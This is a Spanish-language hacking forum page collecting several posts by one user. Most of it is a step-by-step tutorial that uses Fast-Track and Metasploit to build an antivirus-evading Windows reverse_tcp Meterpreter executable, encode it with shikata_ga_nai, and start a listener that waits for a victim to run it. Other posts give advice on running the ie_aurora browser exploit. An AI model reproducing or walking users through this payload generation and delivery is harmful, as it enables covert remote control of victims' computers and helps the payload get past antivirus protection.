Mensajes

[http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb]

Claro que si funciona, Mirad http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb

[RmDir]

Como RmDir, es un comando del Sistema, no lo podes usar asi como asi dentro de VB, tendrias que usar la función Shell (http://msdn.microsoft.com/es-es/library/xe736fyk%28VS.80%29.aspx). Así:

Código (vb) [Seleccionar] Expandir

Shell("RmDir()")

no es ninguna tarea.-

recien hoy empiezo con esto u.u

Ok, entonces empieza consultado y haz preguntas, pero no digas que te hagamos los codes.

No vamos a hacer tu tarea, por lo menos lee los LINK's. ¬¬

[1. Eliminar un Directorio]

1. Eliminar un Directorio (http://www.recursosvisualbasic.com.ar/htm/trucos-codigofuente-visual-basic/35.htm)
2. Crear un Directorio (http://www.recursosvisualbasic.com.ar/htm/tutoriales/tutorial-basico7.htm#mkdir)
3. WTF! No pueden quedar dentro de la Papelera. Pues entonces eliminas el contenido de la papelera (http://www.recursosvisualbasic.com.ar/htm/listado-api/125-vaciar-papelera-reciclaje.htm)

PD: Moverlo a http://foro.elhacker.net/programacion_vb-b50.0/

Saludos!

[PAYLOAD Automatically Generate]

[Fast-Track + Metasploit] PAYLOAD Automatically Generate
[Metasploit By: Shell Root]

Como alguna vez miramos en esté Articulo [Metasploit] Generando Ejecutable con PAYLOAD (http://foro.elhacker.net/hacking_avanzado/metasploit_generando_ejecutable_con_payload-t279407.0.html), en este caso, lo haremos de forma mucho más automatizada con el Script Fast-Track.py

Ingresamos a la carpeta donde se encuentra el archivo Fast-Track.py y lo ejecutamos. Seleccionamos el modo -c (Command Line Mode)

Código [Seleccionar] Expandir

shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c

************************************************************************
Fast-Track Command Line - Where it's OK to finish in under 3 minutes...
************************************************************************

**** MAKE SURE YOU INSTALL ALL THE DEPENDENCIES FIRST  (setup.py) ****

Visit http://trac.thepentest.com for tutorials or to file a bug.

1. Update Menu
2. Autopwn Automated
3. MS-SQL Injector
4. MS-SQL Bruter
5. Binary to Hex Payload Generator
6. Mass Client-Side Attack
7. Exploits
8. SQLPwnage
9. Payload Generator
10. Changelog
11. Credits
12. About

Usage: fast-track.py -c <tool#>

shellroot@shellroot-desktop:~/fasttrack$

Ahora seleccionamos el item 9. Payload Generator

Código [Seleccionar] Expandir

shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c 9

#####################################
###                               ###
### Metasploit Payload Generator  ###
###                               ###
### Written by: Dave Kennedy      ###
### aka ReL1K                     ###
###                               ###
#####################################
#####################################


The Metasploit Payload Generator is a simple tool to
make it extremely easy to generate a payload and listener
on the Metasploit framework. This does not actually
exploit any systems, it will generate a metasploit payload
for you and save it to an executable. You then need to
someone get it on the remote server by yourself and get it
to execute correctly.

This will also encode your payload to get past most AV and
IDS/IPS.

Despues seleccionamos el PAYLOAD que queramos, en este caso usaré el 2. Windows Reverse_TCP Meterpreter

Código [Seleccionar] Expandir

What payload do you want to generate:

Name:                                Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.

Enter choice (example 1-6): 2

Despues seleccionaremos el encoder a usar, recordad que los encoders son para un posible bypasseo de antivirus (Proximo Tutorial "Bypassear Antivirus con MSF"). Seleccionamos 2. shikata_ga_nai

Código [Seleccionar] Expandir

Below is a list of encodings to try and bypass AV.

Select one of the below, Avoid_UTF8_tolower usually gets past them.

1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice : 2

Despues nos pedira el LHOST, digitamos la Dirección IP a la cual queremos que reciba la sessión del Meterpreter.

Código [Seleccionar] Expandir

Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 192.168.142.137

Despues nos pedira el LPORT, digitamos el puerto para poner a la escucha.

Código [Seleccionar] Expandir

Enter the port of the Listener: 1234

Ahora nos da la opcion a elegir entre una ShellCode o un Archivo ejecutable. Seleccionaré 1. Executable

Código [Seleccionar] Expandir

Do you want to create an EXE or Shellcode

1. Executable
2. Shellcode

Enter your choice: 1

A payload has been created in this directory and is named 'payload.exe'. Enjoy!

Yá hemos creado un Archivo Ejecutable con un PAYLOAD, ademas de esta automatización, tambien podemos Automatizar el Auxiliary Multi/Handler. Así que digitamos Yes.

Código [Seleccionar] Expandir

Do you want to start a listener to receive the payload yes or no: yes

Launching Listener...
***********************************************************************************************

Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 192.168.142.137 on Local Port: 1234 Using encoding: ENCODING=shikata_ga_nai

***********************************************************************************************
[*] Please wait while we load the module tree...
[*] Starting the payload handler...
[*] Started reverse handler on port 1234

Como podemos, inicia automaticamente el multi/handler, ademas los parametros que insertamos anteriormente (LHOST, LPORT, Encode), ahora solo esperamos a que la victima ejecute el Archivo Ejecutable, para recibir la session del Meterpreter.

By: Shell Root

Gr3tz: Rcart, Trashhgoo, Messerschmitt, Xzite.
CPH, elhacker.net, DDLR.

esto es lanzado desde linux no??

Ajam, más especificamente desde Ubuntu 9.10... : P

[PAYLOAD]

Porque cuando se conecta el otro usuario me dice Started Bind handler?
y se queda ahi..

Intentad con el PAYLOAD windows/meterpreter/reverse_tcp

[Autopwn]

Nunca dije que hiciera un Escaneo con Nessus, solo dije del comando Autopwn. xD

[\msf3\modules\exploits\windows\browser\]

WTF!, No sé como instalaste ese MSF en WinVista, asi que lo unico que puedo decirte es esto... Mirad la siguiente ruta: \msf3\modules\exploits\windows\browser\, no veo que sea Windows/Exploits... xD

Intentad: use exploit/windows/ie_aurora

Hago una pregunta Stuped! Nombraste el Exploit como ie_aurora.rb?